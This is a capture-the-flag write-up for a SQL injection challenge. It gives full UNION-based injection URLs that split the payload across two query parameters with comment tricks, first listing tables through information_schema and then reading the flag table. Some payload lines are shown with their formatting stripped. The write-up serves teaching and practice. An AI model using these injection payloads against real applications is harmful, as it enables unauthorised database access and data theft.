This is the second challenge of the Limited series. I already analyzed the attached files in the previous writeup (Limited 1) and built the query for the injection, so let’s move directly to the exploitation phase.
🔬 Vulnerability Analysis
Potential Vulnerabilities
SQL Injection
🎯 Solution Path
Exploitation Steps
Initial setup
As mentioned in the previous writeup, the first thing we need to do is extract the name of the table containing the flag, since it’s random. We can achieve this by modifying the query and constructing a query with information_schema.tables, which will help us read all the tables in the database.
Exploitation
So, the first thing I do is modify the initial query to:
to extract the table names, constructing the following link: https://limited-app-974780027560.us-east5.run.app/query?price=10.00&price_op=< /*&limit=*/ 0 UNION SELECT table_name, 2, 3, 4 FROM information_schema.tables WHERE table_schema=database() -- :
Flag Table
After obtaining the name of the table containing the flag (Flag_843423739), I modify the query again to extract the flag from this table:
1
*/0UNIONSELECTvalue,2,3,4FROMFlag_843423739-- "
I then construct the final link again: https://limited-app-974780027560.us-east5.run.app/query?price=10.00&price_op=< /*&limit=*/ 0 UNION SELECT value, 2, 3, 4 FROM Flag_843423739 -- and visiting the page, I obtained the flag.
Flag capture
Manual Flag
🛠️ Exploitation Process
Approach
The automatic exploit first extracts the name of the table containing the flag, and then uses the extracted name to construct the query that extracts the flag from the previously extracted table. After that, it uses a regex to grab the flag and print it.
